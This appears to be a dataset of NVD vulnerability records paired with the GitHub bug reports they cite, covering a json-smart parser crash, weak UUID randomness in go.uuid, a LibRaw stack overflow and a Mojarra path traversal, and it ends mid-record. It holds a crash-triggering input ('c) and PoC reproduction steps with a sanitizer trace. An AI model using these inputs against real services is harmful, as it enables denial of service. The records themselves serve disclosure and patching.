{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v1/issues/10" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v1/pull/11" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v2/issues/67" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v2/pull/68" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00030.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v1/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v1/pull/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v2/issues/67" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v2/pull/68" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:json-smart_project:json-smart-v1:*:*:*:*:*:*:*:*", "matchCriteriaId": "A087629A-9D66-4991-8FC4-DD6B28F8A046", "versionEndExcluding": "1.3.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:json-smart_project:json-smart-v2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4F757C16-6C4E-412F-8E75-95A83F1B68CC", "versionEndExcluding": "2.4.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.4", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "3F906F04-39E4-4BE4-8A73-9D058AAADB43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "7B393A82-476A-4270-A903-38ED4169E431", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "85CAE52B-C2CA-4C6B-A0B7-2B9D6F0499E2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/netplex/json-smart-v1/issues/10
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "netplex", "json-smart-v1" ]
The parser fails to throw the ParseException when the parser read the unclosed `'`, the following example input could cause the ArrayIndexOutOfBoundsException: ``` 'c ``` In detail, when the parser tries to find closed single quotation mark using `indexOf` function, the iteration variable is not sets corretly in line 79: https://github.com/netplex/json-smart-v1/blob/4e6596fca7ffb7d9008684f3d0de179c733df158/json-smart/src/main/java/net/minidev/json/parser/JSONParserByteArray.java#L78-L83 It shouldn't be the `pos` to be checked less than `len`. Instead, the `i` should be checked. The correct way in line 79 is: ``` for (int i = pos; i < len; i++) ``` Any input with unclosed single quotation mark could trigger this. Like the input of `'c`, cause the ArrayIndexOutOfBoundsException
ArrayIndexOutOfBoundsException in parser
https://api.github.com/repos/netplex/json-smart-v1/issues/10/comments
2
2021-04-16T03:02:06Z
2021-05-03T06:50:06Z
https://github.com/netplex/json-smart-v1/issues/10
859,412,261
10
2,010
CVE-2021-31684
2021-06-01T20:15:08.480
A vulnerability was discovered in the indexOf function of JSONParserByteArray in JSON Smart versions 1.3 and 2.4 which causes a denial of service (DOS) via a crafted web request.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v1/issues/10" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v1/pull/11" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v2/issues/67" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v2/pull/68" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00030.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v1/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v1/pull/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v2/issues/67" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/netplex/json-smart-v2/pull/68" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:json-smart_project:json-smart-v1:*:*:*:*:*:*:*:*", "matchCriteriaId": "A087629A-9D66-4991-8FC4-DD6B28F8A046", "versionEndExcluding": "1.3.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:json-smart_project:json-smart-v2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4F757C16-6C4E-412F-8E75-95A83F1B68CC", "versionEndExcluding": "2.4.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.4", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "3F906F04-39E4-4BE4-8A73-9D058AAADB43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "7B393A82-476A-4270-A903-38ED4169E431", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "85CAE52B-C2CA-4C6B-A0B7-2B9D6F0499E2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/netplex/json-smart-v2/issues/67
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "netplex", "json-smart-v2" ]
Same as https://github.com/netplex/json-smart-v1/issues/10 The code base is at https://github.com/netplex/json-smart-v2/blob/00955f7fb9705f4ad1c5f4956f2466344ebb2eae/json-smart/src/main/java/net/minidev/json/parser/JSONParserByteArray.java#L77-L82 It shouldn't be the `pos` to be checked less than `len`. Instead, the `i` should be checked. The correct way in line 79 is: ``` for (int i = pos; i < len; i++) ``` Any input with unclosed single quotation mark could trigger this. Like the input of `'c`, cause the ArrayIndexOutOfBoundsException
ArrayIndexOutOfBoundsException in parser
https://api.github.com/repos/netplex/json-smart-v2/issues/67/comments
7
2021-04-16T03:21:57Z
2021-06-19T04:40:09Z
https://github.com/netplex/json-smart-v2/issues/67
859,419,819
67
2,011
CVE-2021-3538
2021-06-02T14:15:09.993
A flaw was found in github.com/satori/go.uuid in versions from commit 0ef6afb2f6cdd6cdaeee3885a95099c63f18fc8c to d91630c8510268e75203009fe7daf2b8e1d60c45. Due to insecure randomness in the g.rand.Read function the generated UUIDs are predictable for an attacker.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1954376" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/satori/go.uuid/issues/73" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSATORIGOUUID-72488" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1954376" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/satori/go.uuid/issues/73" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSATORIGOUUID-72488" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:satori:uuid:-:*:*:*:*:go:*:*", "matchCriteriaId": "AB02B571-6BC5-4D0E-AC19-46AEB20E5B0A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "338" ]
338
https://github.com/satori/go.uuid/issues/73
[ "Third Party Advisory" ]
github.com
[ "satori", "go.uuid" ]
I'm running this on my macbook pro. I'm using uuid.Must(uuid.NewV4()).String() to generate random identifiers. I'm generating theses identifiers at a _very_ low rate of a few dozen per days Here are some non-random UUID that I got in the last weeks: ``` 02524e6f-65a7-4cf5-8000-0000000000002 6e3ef1c8-0000-4000-8000-0000000000001 fa07f1e9-a8a0-427f-8103-e34e000000000 2cfa392b-71d5-4000-8000-000000000000 5f16db16-56ce-4000-8000-000000000000 bac73b37-aab3-498b-8000-000000000000 da5bd82d-4f98-4b51-8000-000000000000 eb245e52-535f-4274-8350-3a7200000000 f7510000-0000-4000-8000-000000000000 5936f955-286e-47ac-8000-000000000000 0a14da92-0000-4000-8000-000000000000 80730000-0000-4000-8000-000000000000 cd2b88a5-0000-4000-8000-000000000000 ``` I think I shouldn't have theses.
NewV4: non-random uuid
https://api.github.com/repos/satori/go.uuid/issues/73/comments
46
2018-03-23T20:58:32Z
2024-10-21T04:02:55Z
https://github.com/satori/go.uuid/issues/73
308,176,912
73
2,012
CVE-2020-24870
2021-06-02T16:15:08.287
Libraw before 0.20.1 has a stack buffer overflow via LibRaw::identify_process_dng_fields in identify.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/4feaed4dea636cee4fee010f615881ccf76a096d" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/330" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202208-07" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/commit/4feaed4dea636cee4fee010f615881ccf76a096d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/LibRaw/LibRaw/issues/330" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202208-07" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libraw:libraw:*:*:*:*:*:*:*:*", "matchCriteriaId": "496898A6-5B52-4DDA-8671-83014BAD5FC5", "versionEndExcluding": "0.20.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/LibRaw/LibRaw/issues/330
[ "Third Party Advisory" ]
github.com
[ "LibRaw", "LibRaw" ]
poc: [poc.tiff.zip](https://github.com/LibRaw/LibRaw/files/5093659/poc.tiff.zip) reproduce steps: 1. compile libraw with Address sanitizer 2. run command dcraw_emu poc.tiff result: ``` ================================================================= ==28701==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc48fb70a0 at pc 0x0000006b4b25 bp 0x7ffc48fb6f90 sp 0x7ffc48fb6f88 READ of size 8 at 0x7ffc48fb70a0 thread T0 #0 0x6b4b24 in LibRaw::identify_process_dng_fields() /home/casper/targets/struct/libraw/afl/BUILD/src/metadata/identify.cpp:1309:24 #1 0x69688e in LibRaw::identify() /home/casper/targets/struct/libraw/afl/BUILD/src/metadata/identify.cpp:1055:4 #2 0x53e843 in LibRaw::open_datastream(LibRaw_abstract_datastream*) /home/casper/targets/struct/libraw/afl/BUILD/src/utils/open.cpp:390:4 #3 0x53d0fe in LibRaw::open_file(char const*, long long) /home/casper/targets/struct/libraw/afl/BUILD/src/utils/open.cpp:61:13 #4 0x4f5efa in main /home/casper/targets/struct/libraw/afl/BUILD/samples/dcraw_emu.cpp:562:28 #5 0x7f24ee8f1b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x41d829 in _start (/home/casper/targets/struct/libraw/afl/smallrun/dcraw_emu+0x41d829) Address 0x7ffc48fb70a0 is located in stack of thread T0 at offset 256 in frame #0 0x6adf8f in LibRaw::identify_process_dng_fields() /home/casper/targets/struct/libraw/afl/BUILD/src/metadata/identify.cpp:1216 This frame has 10 object(s): [32, 40) 'illidx' (line 1247) [64, 72) 'cmidx' (line 1247) [96, 104) 'calidx' (line 1247) [128, 256) 'cc' (line 1263) <== Memory access at offset 256 overflows this variable [288, 384) 'cm' (line 1263) [416, 512) 'cam_xyz' (line 1263) [544, 560) 'csum' (line 1485) [576, 592) 'ccount' (line 1485) [608, 624) 'csum1359' (line 1504) [640, 656) 'ccount1360' (line 1504) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/casper/targets/struct/libraw/afl/BUILD/src/metadata/identify.cpp:1309:24 in LibRaw::identify_process_dng_fields() Shadow bytes around the buggy address: 0x1000091eedc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000091eedd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000091eede0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000091eedf0: 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 0x1000091eee00: 00 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 =>0x1000091eee10: 00 00 00 00[f2]f2 f2 f2 00 00 00 00 00 00 00 00 0x1000091eee20: 00 00 00 00 f2 f2 f2 f2 00 00 00 00 00 00 00 00 0x1000091eee30: 00 00 00 00 f2 f2 f2 f2 f8 f8 f2 f2 f8 f8 f2 f2 0x1000091eee40: f8 f8 f2 f2 f8 f8 f3 f3 00 00 00 00 00 00 00 00 0x1000091eee50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000091eee60: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==28701==ABORTING ```
stack buffer overflow in LibRaw::identify_process_dng_fields in identify.cpp
https://api.github.com/repos/LibRaw/LibRaw/issues/330/comments
2
2020-08-19T02:03:53Z
2021-02-13T14:59:34Z
https://github.com/LibRaw/LibRaw/issues/330
681,491,556
330
2,013
CVE-2020-6950
2021-06-02T16:15:08.357
Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=550943" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/eclipse-ee4j/mojarra/commit/cefbb9447e7be560e59da2da6bd7cb93776f7741" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/eclipse-ee4j/mojarra/issues/4571" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=550943" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/eclipse-ee4j/mojarra/commit/cefbb9447e7be560e59da2da6bd7cb93776f7741" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/eclipse-ee4j/mojarra/issues/4571" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:*", "matchCriteriaId": "66404103-D535-4D06-BC59-5A62894A8688", "versionEndExcluding": "2.3.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:banking_enterprise_default_management:2.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "74C7E2F1-17FC-4322-A5C3-F7EB612BA4F5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_enterprise_default_management:2.12.0:*:*:*:*:*:*:*", "matchCriteriaId": "320D36DA-D99F-4149-B582-3F4AB2F41A1B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "132CE62A-FBFC-4001-81EC-35D81F73AF48", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_platform:2.7.1:*:*:*:*:*:*:*", "matchCriteriaId": "645AA3D1-C8B5-4CD2-8ACE-31541FA267F0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_platform:2.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "AB9FC9AB-1070-420F-870E-A5EC43A924A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_platform:2.12.0:*:*:*:*:*:*:*", "matchCriteriaId": "BDC6D658-09EA-4C41-869F-1C2EA163F751", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "B21E6EEF-2AB7-4E96-B092-1F49D11B4175", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_pricing_design_center:12.0.0.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7B49D71-6A31-497A-B6A9-06E84F086E7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:hyperion_calculation_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "46F62908-6044-487E-A625-86083A099304", "versionEndExcluding": "11.2.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_merchandising_system:19.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "AE1BC44A-F0AF-41CD-9CEB-B07AB5ADAB38", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:solaris_cluster:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "87A83709-4D38-4844-8928-0C2D6F2033BD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": 